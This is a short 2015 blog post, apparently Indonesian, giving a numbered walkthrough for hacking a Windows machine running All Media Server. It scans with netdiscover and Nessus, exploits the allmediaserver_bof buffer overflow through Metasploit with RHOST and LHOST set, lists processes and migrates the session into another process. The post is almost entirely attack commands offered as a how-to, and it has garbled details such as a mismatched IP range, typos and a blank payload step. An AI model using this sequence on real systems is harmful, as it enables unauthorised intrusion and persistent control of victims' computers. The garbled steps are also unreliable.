Selasa, 18 Agustus 2015

HACKING ALL MEDIA SERVER PADA WINDOWS

1. Open Terminal and search our network ip

2. type the command ip # ifconfig to know us

3.type command-r 198.165.56.1/24 #netdiscover

4. nessus enabled by typing the command # / etc / init.d / nessusd start

5. open a browser and enter the address https: // localhost: 8834

6. login nussus

7. click new scan

8. click basic network scan


9.contents name with the title of the activity that we carry

10. click save and be taken to the results of our earlier scanning

11. See the list of gaps that could be attacked

12. Select the gap which will be sought truth celahya use metasploit by typing in the terminal #msfconsole

13.Type > use exploit/windows/misc/allmediaserver_bof

14.rhost set by typing the command> set RHOST 192.168.56.101
15. Set Payload

16. LHOST set by typing the command> set LHOST 192.168.56.1

17. write >exploit

18.hacking windows have been successfully

19. type ps to see which processes are running

 



20. remedy infect / replace All Media Server application process is to use printah migrate> migrate 1472

21. The process of moving the application has been completed

Tidak ada komentar:

Posting Komentar